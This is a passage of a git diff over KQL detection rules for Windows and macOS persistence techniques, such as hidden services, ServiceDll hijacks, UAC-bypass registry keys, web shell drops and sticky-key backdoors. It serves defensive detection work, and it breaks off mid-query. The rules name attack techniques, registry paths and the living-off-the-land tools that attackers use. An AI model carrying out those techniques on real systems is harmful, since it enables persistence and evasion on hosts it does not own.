attack.privilege-escalation, attack.t1574.011 - -DeviceProcessEvents +// Title: Service DACL Abuse To Hide Services Via Sc.EXE +// Author: Andreas Hunkeler (@Karneades) +// Date: 2021-12-20 +// Level: high +// Description: Detects usage of the "sc.exe" utility adding a new service with special permission seen used by threat actors which makes the service hidden and unremovable. +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.defense-evasion, attack.privilege-escalation, attack.t1574.011 + +DeviceProcessEvents | where (ProcessCommandLine contains "sdset" and ProcessCommandLine contains "DCLCWPDTSD") and (FolderPath endswith "\\sc.exe" or ProcessVersionInfoOriginalFileName =~ "sc.exe") \ No newline at end of file diff --git a/KQL/rules/Persistence/service_security_descriptor_tampering_via_sc_exe.kql b/KQL/rules/Persistence/service_security_descriptor_tampering_via_sc_exe.kql index c6a06180..a6c459f6 100644 --- a/KQL/rules/Persistence/service_security_descriptor_tampering_via_sc_exe.kql +++ b/KQL/rules/Persistence/service_security_descriptor_tampering_via_sc_exe.kql @@ -1,10 +1,10 @@ -// Title: Service Security Descriptor Tampering Via Sc.EXE -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023-02-28 -// Level: medium -// Description: Detection of sc.exe utility adding a new service with special permission which hides that service. -// MITRE Tactic: Persistence -// Tags: attack.persistence, attack.defense-evasion, attack.privilege-escalation, attack.t1574.011 - -DeviceProcessEvents +// Title: Service Security Descriptor Tampering Via Sc.EXE +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-02-28 +// Level: medium +// Description: Detection of sc.exe utility adding a new service with special permission which hides that service. +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.defense-evasion, attack.privilege-escalation, attack.t1574.011 + +DeviceProcessEvents | where ProcessCommandLine contains "sdset" and (FolderPath endswith "\\sc.exe" or ProcessVersionInfoOriginalFileName =~ "sc.exe") \ No newline at end of file diff --git a/KQL/rules/Persistence/servicedll_hijack.kql b/KQL/rules/Persistence/servicedll_hijack.kql index 0ebe5ce0..372f8f5f 100644 --- a/KQL/rules/Persistence/servicedll_hijack.kql +++ b/KQL/rules/Persistence/servicedll_hijack.kql @@ -1,14 +1,14 @@ -// Title: ServiceDll Hijack -// Author: frack113 -// Date: 2022-02-04 -// Level: medium -// Description: Detects changes to the "ServiceDLL" value related to a service in the registry. -// This is often used as a method of persistence. -// MITRE Tactic: Persistence -// Tags: attack.persistence, attack.privilege-escalation, attack.t1543.003 -// False Positives: -// - Administrative scripts -// - Installation of a service - -DeviceRegistryEvents +// Title: ServiceDll Hijack +// Author: frack113 +// Date: 2022-02-04 +// Level: medium +// Description: Detects changes to the "ServiceDLL" value related to a service in the registry. +// This is often used as a method of persistence. +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.privilege-escalation, attack.t1543.003 +// False Positives: +// - Administrative scripts +// - Installation of a service + +DeviceRegistryEvents | where ((RegistryKey endswith "\\System*" and RegistryKey contains "ControlSet" and RegistryKey endswith "\\Services*") and RegistryKey endswith "\\Parameters\\ServiceDll") and (not(((RegistryValueData =~ "%%systemroot%%\\system32\\ntdsa.dll" and InitiatingProcessFolderPath =~ "C:\\Windows\\system32\\lsass.exe" and RegistryKey endswith "\\Services\\NTDS\\Parameters\\ServiceDll") or InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\poqexec.exe" or RegistryValueData =~ "C:\\Windows\\system32\\spool\\drivers\\x64\\3\\PrintConfig.dll"))) and (not((RegistryValueData =~ "C:\\Windows\\System32\\STAgent.dll" and InitiatingProcessFolderPath endswith "\\regsvr32.exe"))) \ No newline at end of file diff --git a/KQL/rules/Persistence/shell_open_registry_keys_manipulation.kql b/KQL/rules/Persistence/shell_open_registry_keys_manipulation.kql index b774d693..24917ebc 100644 --- a/KQL/rules/Persistence/shell_open_registry_keys_manipulation.kql +++ b/KQL/rules/Persistence/shell_open_registry_keys_manipulation.kql @@ -1,10 +1,10 @@ -// Title: Shell Open Registry Keys Manipulation -// Author: Christian Burkard (Nextron Systems) -// Date: 2021-08-30 -// Level: high -// Description: Detects the shell open key manipulation (exefile and ms-settings) used for persistence and the pattern of UAC Bypass using fodhelper.exe, computerdefaults.exe, slui.exe via registry keys (e.g. UACMe 33 or 62) -// MITRE Tactic: Persistence -// Tags: attack.persistence, attack.defense-evasion, attack.privilege-escalation, attack.t1548.002, attack.t1546.001 - -DeviceRegistryEvents +// Title: Shell Open Registry Keys Manipulation +// Author: Christian Burkard (Nextron Systems) +// Date: 2021-08-30 +// Level: high +// Description: Detects the shell open key manipulation (exefile and ms-settings) used for persistence and the pattern of UAC Bypass using fodhelper.exe, computerdefaults.exe, slui.exe via registry keys (e.g. UACMe 33 or 62) +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.defense-evasion, attack.privilege-escalation, attack.t1548.002, attack.t1546.001 + +DeviceRegistryEvents | where (RegistryValueData contains "\\Software\\Classes\\{" and ActionType =~ "RegistryValueSet" and RegistryKey endswith "Classes\\ms-settings\\shell\\open\\command\\SymbolicLinkValue") or RegistryKey endswith "Classes\\ms-settings\\shell\\open\\command\\DelegateExecute" or ((ActionType =~ "RegistryValueSet" and (RegistryKey endswith "Classes\\ms-settings\\shell\\open\\command\\(Default)" or RegistryKey endswith "Classes\\exefile\\shell\\open\\command\\(Default)")) and (not(RegistryValueData =~ "(Empty)"))) \ No newline at end of file diff --git a/KQL/rules/Persistence/shimcache_flush.kql b/KQL/rules/Persistence/shimcache_flush.kql index ad06b4b2..c8409337 100644 --- a/KQL/rules/Persistence/shimcache_flush.kql +++ b/KQL/rules/Persistence/shimcache_flush.kql @@ -1,10 +1,10 @@ -// Title: ShimCache Flush -// Author: Florian Roth (Nextron Systems) -// Date: 2021-02-01 -// Level: high -// Description: Detects actions that clear the local ShimCache and remove forensic evidence -// MITRE Tactic: Persistence -// Tags: attack.persistence, attack.defense-evasion, attack.t1112 - -DeviceProcessEvents +// Title: ShimCache Flush +// Author: Florian Roth (Nextron Systems) +// Date: 2021-02-01 +// Level: high +// Description: Detects actions that clear the local ShimCache and remove forensic evidence +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.defense-evasion, attack.t1112 + +DeviceProcessEvents | where ((ProcessCommandLine contains "rundll32" and ProcessCommandLine contains "apphelp.dll") and (ProcessCommandLine contains "ShimFlushCache" or ProcessCommandLine contains "#250")) or ((ProcessCommandLine contains "rundll32" and ProcessCommandLine contains "kernel32.dll") and (ProcessCommandLine contains "BaseFlushAppcompatCache" or ProcessCommandLine contains "#46")) \ No newline at end of file diff --git a/KQL/rules/Persistence/startup_item_file_created_macos.kql b/KQL/rules/Persistence/startup_item_file_created_macos.kql index c1543493..3b979933 100644 --- a/KQL/rules/Persistence/startup_item_file_created_macos.kql +++ b/KQL/rules/Persistence/startup_item_file_created_macos.kql @@ -1,14 +1,14 @@ -// Title: Startup Item File Created - MacOS -// Author: Alejandro Ortuno, oscd.community -// Date: 2020-10-14 -// Level: low -// Description: Detects the creation of a startup item plist file, that automatically get executed at boot initialization to establish persistence. -// Adversaries may use startup items automatically executed at boot initialization to establish persistence. -// Startup items execute during the final phase of the boot process and contain shell scripts or other executable files along with configuration information used by the system to determine the execution order for all startup items. -// MITRE Tactic: Persistence -// Tags: attack.persistence, attack.privilege-escalation, attack.t1037.005 -// False Positives: -// - Legitimate administration activities - -DeviceFileEvents +// Title: Startup Item File Created - MacOS +// Author: Alejandro Ortuno, oscd.community +// Date: 2020-10-14 +// Level: low +// Description: Detects the creation of a startup item plist file, that automatically get executed at boot initialization to establish persistence. +// Adversaries may use startup items automatically executed at boot initialization to establish persistence. +// Startup items execute during the final phase of the boot process and contain shell scripts or other executable files along with configuration information used by the system to determine the execution order for all startup items. +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.privilege-escalation, attack.t1037.005 +// False Positives: +// - Legitimate administration activities + +DeviceFileEvents | where FolderPath endswith ".plist" and (FolderPath startswith "/Library/StartupItems/" or FolderPath startswith "/System/Library/StartupItems") \ No newline at end of file diff --git a/KQL/rules/Persistence/suspicious_aspx_file_drop_by_exchange.kql b/KQL/rules/Persistence/suspicious_aspx_file_drop_by_exchange.kql index dafc5327..7399237b 100644 --- a/KQL/rules/Persistence/suspicious_aspx_file_drop_by_exchange.kql +++ b/KQL/rules/Persistence/suspicious_aspx_file_drop_by_exchange.kql @@ -1,10 +1,10 @@ -// Title: Suspicious ASPX File Drop by Exchange -// Author: Florian Roth (Nextron Systems), MSTI (query, idea) -// Date: 2022-10-01 -// Level: high -// Description: Detects suspicious file type dropped by an Exchange component in IIS into a suspicious folder -// MITRE Tactic: Persistence -// Tags: attack.persistence, attack.t1505.003 - -DeviceFileEvents +// Title: Suspicious ASPX File Drop by Exchange +// Author: Florian Roth (Nextron Systems), MSTI (query, idea) +// Date: 2022-10-01 +// Level: high +// Description: Detects suspicious file type dropped by an Exchange component in IIS into a suspicious folder +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.t1505.003 + +DeviceFileEvents | where (InitiatingProcessCommandLine contains "MSExchange" and InitiatingProcessFolderPath endswith "\\w3wp.exe" and (FolderPath contains "FrontEnd\\HttpProxy\\" or FolderPath contains "\\inetpub\\wwwroot\\aspnet_client\\")) and (FolderPath endswith ".aspx" or FolderPath endswith ".asp" or FolderPath endswith ".ashx") \ No newline at end of file diff --git a/KQL/rules/Persistence/suspicious_chromium_browser_instance_executed_with_custom_extension.kql b/KQL/rules/Persistence/suspicious_chromium_browser_instance_executed_with_custom_extension.kql index a3e73e24..b280e656 100644 --- a/KQL/rules/Persistence/suspicious_chromium_browser_instance_executed_with_custom_extension.kql +++ b/KQL/rules/Persistence/suspicious_chromium_browser_instance_executed_with_custom_extension.kql @@ -1,10 +1,10 @@ -// Title: Suspicious Chromium Browser Instance Executed With Custom Extension -// Author: Aedan Russell, frack113, X__Junior (Nextron Systems) -// Date: 2022-06-19 -// Level: high -// Description: Detects a suspicious process spawning a Chromium based browser process with the 'load-extension' flag to start an instance with a custom extension -// MITRE Tactic: Persistence -// Tags: attack.persistence, attack.t1176.001 - -DeviceProcessEvents +// Title: Suspicious Chromium Browser Instance Executed With Custom Extension +// Author: Aedan Russell, frack113, X__Junior (Nextron Systems) +// Date: 2022-06-19 +// Level: high +// Description: Detects a suspicious process spawning a Chromium based browser process with the 'load-extension' flag to start an instance with a custom extension +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.t1176.001 + +DeviceProcessEvents | where ProcessCommandLine contains "--load-extension=" and (FolderPath endswith "\\brave.exe" or FolderPath endswith "\\chrome.exe" or FolderPath endswith "\\msedge.exe" or FolderPath endswith "\\opera.exe" or FolderPath endswith "\\vivaldi.exe") and (InitiatingProcessFolderPath endswith "\\cmd.exe" or InitiatingProcessFolderPath endswith "\\cscript.exe" or InitiatingProcessFolderPath endswith "\\mshta.exe" or InitiatingProcessFolderPath endswith "\\powershell.exe" or InitiatingProcessFolderPath endswith "\\pwsh.exe" or InitiatingProcessFolderPath endswith "\\regsvr32.exe" or InitiatingProcessFolderPath endswith "\\rundll32.exe" or InitiatingProcessFolderPath endswith "\\wscript.exe") \ No newline at end of file diff --git a/KQL/rules/Persistence/suspicious_debugger_registration_cmdline.kql b/KQL/rules/Persistence/suspicious_debugger_registration_cmdline.kql index 0587ee17..4082a334 100644 --- a/KQL/rules/Persistence/suspicious_debugger_registration_cmdline.kql +++ b/KQL/rules/Persistence/suspicious_debugger_registration_cmdline.kql @@ -1,10 +1,10 @@ -// Title: Suspicious Debugger Registration Cmdline -// Author: Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro -// Date: 2019-09-06 -// Level: high -// Description: Detects the registration of a debugger for a program that is available in the logon screen (sticky key backdoor). -// MITRE Tactic: Persistence -// Tags: attack.persistence, attack.privilege-escalation, attack.t1546.008 - -DeviceProcessEvents +// Title: Suspicious Debugger Registration Cmdline +// Author: Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro +// Date: 2019-09-06 +// Level: high +// Description: Detects the registration of a debugger for a program that is available in the logon screen (sticky key backdoor). +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.privilege-escalation, attack.t1546.008 + +DeviceProcessEvents | where ProcessCommandLine contains "\\CurrentVersion\\Image File Execution Options\\" and (ProcessCommandLine contains "sethc.exe" or ProcessCommandLine contains "utilman.exe" or ProcessCommandLine contains "osk.exe" or ProcessCommandLine contains "magnify.exe" or ProcessCommandLine contains "narrator.exe" or ProcessCommandLine contains "displayswitch.exe" or ProcessCommandLine contains "atbroker.exe" or ProcessCommandLine contains "HelpPane.exe") \ No newline at end of file diff --git a/KQL/rules/Persistence/suspicious_file_creation_activity_from_fake_recycle_bin_folder.kql b/KQL/rules/Persistence/suspicious_file_creation_activity_from_fake_recycle_bin_folder.kql index bc22f733..ab80b0ba 100644 --- a/KQL/rules/Persistence/suspicious_file_creation_activity_from_fake_recycle_bin_folder.kql +++ b/KQL/rules/Persistence/suspicious_file_creation_activity_from_fake_recycle_bin_folder.kql @@ -1,10 +1,10 @@ -// Title: Suspicious File Creation Activity From Fake Recycle.Bin Folder -// Author: X__Junior (Nextron Systems) -// Date: 2023-07-12 -// Level: high -// Description: Detects file write event from/to a fake recycle bin folder that is often used as a staging directory for malware -// MITRE Tactic: Persistence -// Tags: attack.persistence, attack.defense-evasion - -DeviceFileEvents +// Title: Suspicious File Creation Activity From Fake Recycle.Bin Folder +// Author: X__Junior (Nextron Systems) +// Date: 2023-07-12 +// Level: high +// Description: Detects file write event from/to a fake recycle bin folder that is often used as a staging directory for malware +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.defense-evasion + +DeviceFileEvents | where (InitiatingProcessFolderPath contains "RECYCLERS.BIN\\" or InitiatingProcessFolderPath contains "RECYCLER.BIN\\") or (FolderPath contains "RECYCLERS.BIN\\" or FolderPath contains "RECYCLER.BIN\\") \ No newline at end of file diff --git a/KQL/rules/Persistence/suspicious_file_drop_by_exchange.kql b/KQL/rules/Persistence/suspicious_file_drop_by_exchange.kql index 14be4920..a30d927a 100644 --- a/KQL/rules/Persistence/suspicious_file_drop_by_exchange.kql +++ b/KQL/rules/Persistence/suspicious_file_drop_by_exchange.kql @@ -1,10 +1,10 @@ -// Title: Suspicious File Drop by Exchange -// Author: Florian Roth (Nextron Systems) -// Date: 2022-10-04 -// Level: medium -// Description: Detects suspicious file type dropped by an Exchange component in IIS -// MITRE Tactic: Persistence -// Tags: attack.persistence, attack.t1190, attack.initial-access, attack.t1505.003 - -DeviceFileEvents +// Title: Suspicious File Drop by Exchange +// Author: Florian Roth (Nextron Systems) +// Date: 2022-10-04 +// Level: medium +// Description: Detects suspicious file type dropped by an Exchange component in IIS +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.t1190, attack.initial-access, attack.t1505.003 + +DeviceFileEvents | where (InitiatingProcessCommandLine contains "MSExchange" and InitiatingProcessFolderPath endswith "\\w3wp.exe") and (FolderPath endswith ".aspx" or FolderPath endswith ".asp" or FolderPath endswith ".ashx" or FolderPath endswith ".ps1" or FolderPath endswith ".bat" or FolderPath endswith ".exe" or FolderPath endswith ".dll" or FolderPath endswith ".vbs") \ No newline at end of file diff --git a/KQL/rules/Persistence/suspicious_file_write_to_webapps_root_directory.kql b/KQL/rules/Persistence/suspicious_file_write_to_webapps_root_directory.kql index 1eb691f2..91fcbf55 100644 --- a/KQL/rules/Persistence/suspicious_file_write_to_webapps_root_directory.kql +++ b/KQL/rules/Persistence/suspicious_file_write_to_webapps_root_directory.kql @@ -1,11 +1,11 @@ -// Title: Suspicious File Write to Webapps Root Directory -// Author: Swachchhanda Shrawan Poudel (Nextron Systems) -// Date: 2025-10-20 -// Level: medium -// Description: Detects suspicious file writes to the root directory of web applications, particularly Apache web servers or Tomcat servers. -// This may indicate an attempt to deploy malicious files such as web shells or other unauthorized scripts. -// MITRE Tactic: Persistence -// Tags: attack.persistence, attack.t1505.003, attack.initial-access, attack.t1190 - -DeviceFileEvents +// Title: Suspicious File Write to Webapps Root Directory +// Author: Swachchhanda Shrawan Poudel (Nextron Systems) +// Date: 2025-10-20 +// Level: medium +// Description: Detects suspicious file writes to the root directory of web applications, particularly Apache web servers or Tomcat servers. +// This may indicate an attempt to deploy malicious files such as web shells or other unauthorized scripts. +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.t1505.003, attack.initial-access, attack.t1190 + +DeviceFileEvents | where FolderPath contains "\\webapps\\ROOT\\" and (FolderPath contains "\\apache" or FolderPath contains "\\tomcat") and FolderPath endswith ".jsp" and (InitiatingProcessFolderPath endswith "\\dotnet.exe" or InitiatingProcessFolderPath endswith "\\w3wp.exe" or InitiatingProcessFolderPath endswith "\\java.exe") \ No newline at end of file diff --git a/KQL/rules/Persistence/suspicious_iis_module_registration.kql b/KQL/rules/Persistence/suspicious_iis_module_registration.kql index 7b2e08b7..b07ae179 100644 --- a/KQL/rules/Persistence/suspicious_iis_module_registration.kql +++ b/KQL/rules/Persistence/suspicious_iis_module_registration.kql @@ -1,12 +1,12 @@ -// Title: Suspicious IIS Module Registration -// Author: Florian Roth (Nextron Systems), Microsoft (idea) -// Date: 2022-08-04 -// Level: high -// Description: Detects a suspicious IIS module registration as described in Microsoft threat report on IIS backdoors -// MITRE Tactic: Persistence -// Tags: attack.persistence, attack.t1505.004 -// False Positives: -// - Administrative activity - -DeviceProcessEvents +// Title: Suspicious IIS Module Registration +// Author: Florian Roth (Nextron Systems), Microsoft (idea) +// Date: 2022-08-04 +// Level: high +// Description: Detects a suspicious IIS module registration as described in Microsoft threat report on IIS backdoors +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.t1505.004 +// False Positives: +// - Administrative activity + +DeviceProcessEvents | where InitiatingProcessFolderPath endswith "\\w3wp.exe" and (ProcessCommandLine contains "appcmd.exe add module" or (ProcessCommandLine contains " system.enterpriseservices.internal.publish" and FolderPath endswith "\\powershell.exe") or (ProcessCommandLine contains "gacutil" and ProcessCommandLine contains " /I")) \ No newline at end of file diff --git a/KQL/rules/Persistence/suspicious_new_service_creation.kql b/KQL/rules/Persistence/suspicious_new_service_creation.kql index 5202d2e0..308b2067 100644 --- a/KQL/rules/Persistence/suspicious_new_service_creation.kql +++ b/KQL/rules/Persistence/suspicious_new_service_creation.kql @@ -1,12 +1,12 @@ -// Title: Suspicious New Service Creation -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022-07-14 -// Level: high -// Description: Detects creation of a new service via "sc" command or the powershell "new-service" cmdlet with suspicious binary paths -// MITRE Tactic: Persistence -// Tags: attack.persistence, attack.privilege-escalation, attack.t1543.003 -// False Positives: -// - Unlikely - -DeviceProcessEvents +// Title: Suspicious New Service Creation +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-07-14 +// Level: high +// Description: Detects creation of a new service via "sc" command or the powershell "new-service" cmdlet with suspicious binary paths +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.privilege-escalation, attack.t1543.003 +// False Positives: +// - Unlikely + +DeviceProcessEvents | where ((ProcessCommandLine contains "New-Service" and ProcessCommandLine contains "-BinaryPathName") or ((ProcessCommandLine contains "create" and ProcessCommandLine contains "binPath=") and FolderPath endswith "\\sc.exe")) and (ProcessCommandLine contains "powershell" or ProcessCommandLine contains "mshta" or ProcessCommandLine contains "wscript" or ProcessCommandLine contains "cscript" or ProcessCommandLine contains "svchost" or ProcessCommandLine contains "dllhost" or ProcessCommandLine contains "cmd " or ProcessCommandLine contains "cmd.exe /c" or ProcessCommandLine contains "cmd.exe /k" or ProcessCommandLine contains "cmd.exe /r" or ProcessCommandLine contains "rundll32" or ProcessCommandLine contains "C:\\Users\\Public" or ProcessCommandLine contains "\\Downloads\\" or ProcessCommandLine contains "\\Desktop\\" or ProcessCommandLine contains "\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\" or ProcessCommandLine contains "C:\\Windows\\TEMP\\" or ProcessCommandLine contains "\\AppData\\Local\\Temp") \ No newline at end of file diff --git a/KQL/rules/Persistence/suspicious_printer_driver_empty_manufacturer.kql b/KQL/rules/Persistence/suspicious_printer_driver_empty_manufacturer.kql index 9b458273..72c85e6e 100644 --- a/KQL/rules/Persistence/suspicious_printer_driver_empty_manufacturer.kql +++ b/KQL/rules/Persistence/suspicious_printer_driver_empty_manufacturer.kql @@ -1,12 +1,12 @@ -// Title: Suspicious Printer Driver Empty Manufacturer -// Author: Florian Roth (Nextron Systems) -// Date: 2020-07-01 -// Level: high -// Description: Detects a suspicious printer driver installation with an empty Manufacturer value -// MITRE Tactic: Persistence -// Tags: attack.persistence, attack.defense-evasion, attack.privilege-escalation, attack.t1574, cve.2021-1675 -// False Positives: -// - Alerts on legitimate printer drivers that do not set any more details in the Manufacturer value - -DeviceRegistryEvents +// Title: Suspicious Printer Driver Empty Manufacturer +// Author: Florian Roth (Nextron Systems) +// Date: 2020-07-01 +// Level: high +// Description: Detects a suspicious printer driver installation with an empty Manufacturer value +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.defense-evasion, attack.privilege-escalation, attack.t1574, cve.2021-1675 +// False Positives: +// - Alerts on legitimate printer drivers that do not set any more details in the Manufacturer value + +DeviceRegistryEvents | where (RegistryValueData =~ "(Empty)" and (RegistryKey contains "\\Control\\Print\\Environments\\Windows x64\\Drivers" and RegistryKey contains "\\Manufacturer")) and (not((RegistryKey endswith "\\CutePDF Writer v4.0*" or RegistryKey endswith "\\Version-3\\PDF24*" or (RegistryKey endswith "\\VNC Printer (PS)*" or RegistryKey endswith "\\VNC Printer (UD)*")))) \ No newline at end of file diff --git a/KQL/rules/Persistence/suspicious_process_by_web_server_process.kql b/KQL/rules/Persistence/suspicious_process_by_web_server_process.kql index ec98b945..387273e9 100644 --- a/KQL/rules/Persistence/suspicious_process_by_web_server_process.kql +++ b/KQL/rules/Persistence/suspicious_process_by_web_server_process.kql @@ -1,12 +1,12 @@ -// Title: Suspicious Process By Web Server Process -// Author: Thomas Patzke, Florian Roth (Nextron Systems), Zach Stanford @svch0st, Tim Shelton, Nasreddine Bencherchali (Nextron Systems) -// Date: 2019-01-16 -// Level: high -// Description: Detects potentially suspicious processes being spawned by a web server process which could be the result of a successfully placed web shell or exploitation -// MITRE Tactic: Persistence -// Tags: attack.persistence, attack.initial-access, attack.t1505.003, attack.t1190 -// False Positives: -// - Particular web applications may spawn a shell process legitimately - -DeviceProcessEvents +// Title: Suspicious Process By Web Server Process +// Author: Thomas Patzke, Florian Roth (Nextron Systems), Zach Stanford @svch0st, Tim Shelton, Nasreddine Bencherchali (Nextron Systems) +// Date: 2019-01-16 +// Level: high +// Description: Detects potentially suspicious processes being spawned by a web server process which could be the result of a successfully placed web shell or exploitation +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.initial-access, attack.t1505.003, attack.t1190 +// False Positives: +// - Particular web applications may spawn a shell process legitimately + +DeviceProcessEvents | where (((InitiatingProcessFolderPath contains "-tomcat-" or InitiatingProcessFolderPath contains "\\tomcat") and (InitiatingProcessFolderPath endswith "\\java.exe" or InitiatingProcessFolderPath endswith "\\javaw.exe")) or ((InitiatingProcessCommandLine contains "CATALINA_HOME" or InitiatingProcessCommandLine contains "catalina.home" or InitiatingProcessCommandLine contains "catalina.jar") and (InitiatingProcessFolderPath endswith "\\java.exe" or InitiatingProcessFolderPath endswith "\\javaw.exe")) or (InitiatingProcessFolderPath endswith "\\caddy.exe" or InitiatingProcessFolderPath endswith "\\httpd.exe" or InitiatingProcessFolderPath endswith "\\nginx.exe" or InitiatingProcessFolderPath endswith "\\php-cgi.exe" or InitiatingProcessFolderPath endswith "\\php.exe" or InitiatingProcessFolderPath endswith "\\tomcat.exe" or InitiatingProcessFolderPath endswith "\\UMWorkerProcess.exe" or InitiatingProcessFolderPath endswith "\\w3wp.exe" or InitiatingProcessFolderPath endswith "\\ws_TomcatService.exe")) and (FolderPath endswith "\\arp.exe" or FolderPath endswith "\\at.exe" or FolderPath endswith "\\bash.exe" or FolderPath endswith "\\bitsadmin.exe" or FolderPath endswith "\\certutil.exe" or FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\dsget.exe" or FolderPath endswith "\\hostname.exe" or FolderPath endswith "\\nbtstat.exe" or FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe" or FolderPath endswith "\\netdom.exe" or FolderPath endswith "\\netsh.exe" or FolderPath endswith "\\nltest.exe" or FolderPath endswith "\\ntdsutil.exe" or FolderPath endswith "\\powershell_ise.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\qprocess.exe" or FolderPath endswith "\\query.exe" or FolderPath endswith "\\qwinsta.exe" or FolderPath endswith "\\reg.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\sc.exe" or FolderPath endswith "\\sh.exe" or FolderPath endswith "\\wmic.exe" or FolderPath endswith "\\wscript.exe" or FolderPath endswith "\\wusa.exe") and (not(((ProcessCommandLine endswith "Windows\\system32\\cmd.exe /c C:\\ManageEngine\\ADManager \"Plus\\ES\\bin\\elasticsearch.bat -Enode.name=RMP-NODE1 -pelasticsearch-pid.txt" and InitiatingProcessFolderPath endswith "\\java.exe") or ((ProcessCommandLine contains "sc query" and ProcessCommandLine contains "ADManager Plus") and InitiatingProcessFolderPath endswith "\\java.exe")))) \ No newline at end of file diff --git a/KQL/rules/Persistence/suspicious_process_execution_from_fake_recycle_bin_folder.kql b/KQL/rules/Persistence/suspicious_process_execution_from_fake_recycle_bin_folder.kql index 4f062d73..9ae2044d 100644 --- a/KQL/rules/Persistence/suspicious_process_execution_from_fake_recycle_bin_folder.kql +++ b/KQL/rules/Persistence/suspicious_process_execution_from_fake_recycle_bin_folder.kql @@ -1,12 +1,12 @@ -// Title: Suspicious Process Execution From Fake Recycle.Bin Folder -// Author: X__Junior (Nextron Systems) -// Date: 2023-07-12 -// Level: high -// Description: Detects process execution from a fake recycle bin folder, often used to avoid security solution. -// MITRE Tactic: Persistence -// Tags: attack.persistence, attack.defense-evasion -// False Positives: -// - Unlikely - -DeviceProcessEvents +// Title: Suspicious Process Execution From Fake Recycle.Bin Folder +// Author: X__Junior (Nextron Systems) +// Date: 2023-07-12 +// Level: high +// Description: Detects process execution from a fake recycle bin folder, often used to avoid security solution. +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.defense-evasion +// False Positives: +// - Unlikely + +DeviceProcessEvents | where FolderPath contains "RECYCLERS.BIN\\" or FolderPath contains "RECYCLER.BIN\\" \ No newline at end of file diff --git a/KQL/rules/Persistence/suspicious_registry_modification_from_ads_via_regini_exe.kql b/KQL/rules/Persistence/suspicious_registry_modification_from_ads_via_regini_exe.kql index 1b81012b..20e2e203 100644 --- a/KQL/rules/Persistence/suspicious_registry_modification_from_ads_via_regini_exe.kql +++ b/KQL/rules/Persistence/suspicious_registry_modification_from_ads_via_regini_exe.kql @@ -1,10 +1,10 @@ -// Title: Suspicious Registry Modification From ADS Via Regini.EXE -// Author: Eli Salem, Sander Wiebing, oscd.community -// Date: 2020-10-12 -// Level: high -// Description: Detects the import of an alternate data stream with regini.exe, regini.exe can be used to modify registry keys. -// MITRE Tactic: Persistence -// Tags: attack.persistence, attack.t1112, attack.defense-evasion - -DeviceProcessEvents +// Title: Suspicious Registry Modification From ADS Via Regini.EXE +// Author: Eli Salem, Sander Wiebing, oscd.community +// Date: 2020-10-12 +// Level: high +// Description: Detects the import of an alternate data stream with regini.exe, regini.exe can be used to modify registry keys. +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.t1112, attack.defense-evasion + +DeviceProcessEvents | where (FolderPath endswith "\\regini.exe" or ProcessVersionInfoOriginalFileName =~ "REGINI.EXE") and ProcessCommandLine matches regex ":[^ \\\\]" \ No newline at end of file diff --git a/KQL/rules/Persistence/suspicious_screensave_change_by_reg_exe.kql b/KQL/rules/Persistence/suspicious_screensave_change_by_reg_exe.kql index 01395494..7cd415cb 100644 --- a/KQL/rules/Persistence/suspicious_screensave_change_by_reg_exe.kql +++ b/KQL/rules/Persistence/suspicious_screensave_change_by_reg_exe.kql @@ -1,13 +1,13 @@ -// Title: Suspicious ScreenSave Change by Reg.exe -// Author: frack113 -// Date: 2021-08-19 -// Level: medium -// Description: Adversaries may establish persistence by executing malicious content triggered by user inactivity. -// Screensavers are programs that execute after a configurable time of user inactivity and consist of Portable Executable (PE) files with a .scr file extension -// MITRE Tactic: Persistence -// Tags: attack.persistence, attack.privilege-escalation, attack.t1546.002 -// False Positives: -// - GPO - -DeviceProcessEvents +// Title: Suspicious ScreenSave Change by Reg.exe +// Author: frack113 +// Date: 2021-08-19 +// Level: medium +// Description: Adversaries may establish persistence by executing malicious content triggered by user inactivity. +// Screensavers are programs that execute after a configurable time of user inactivity and consist of Portable Executable (PE) files with a .scr file extension +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.privilege-escalation, attack.t1546.002 +// False Positives: +// - GPO + +DeviceProcessEvents | where ((ProcessCommandLine contains "HKEY_CURRENT_USER\\Control Panel\\Desktop" or ProcessCommandLine contains "HKCU\\Control Panel\\Desktop") and FolderPath endswith "\\reg.exe") and ((ProcessCommandLine contains "/v ScreenSaveActive" and ProcessCommandLine contains "/t REG_SZ" and ProcessCommandLine contains "/d 1" and ProcessCommandLine contains "/f") or (ProcessCommandLine contains "/v ScreenSaveTimeout" and ProcessCommandLine contains "/t REG_SZ" and ProcessCommandLine contains "/d " and ProcessCommandLine contains "/f") or (ProcessCommandLine contains "/v ScreenSaverIsSecure" and ProcessCommandLine contains "/t REG_SZ" and ProcessCommandLine contains "/d 0" and ProcessCommandLine contains "/f") or (ProcessCommandLine contains "/v SCRNSAVE.EXE" and ProcessCommandLine contains "/t REG_SZ" and ProcessCommandLine contains "/d " and ProcessCommandLine contains 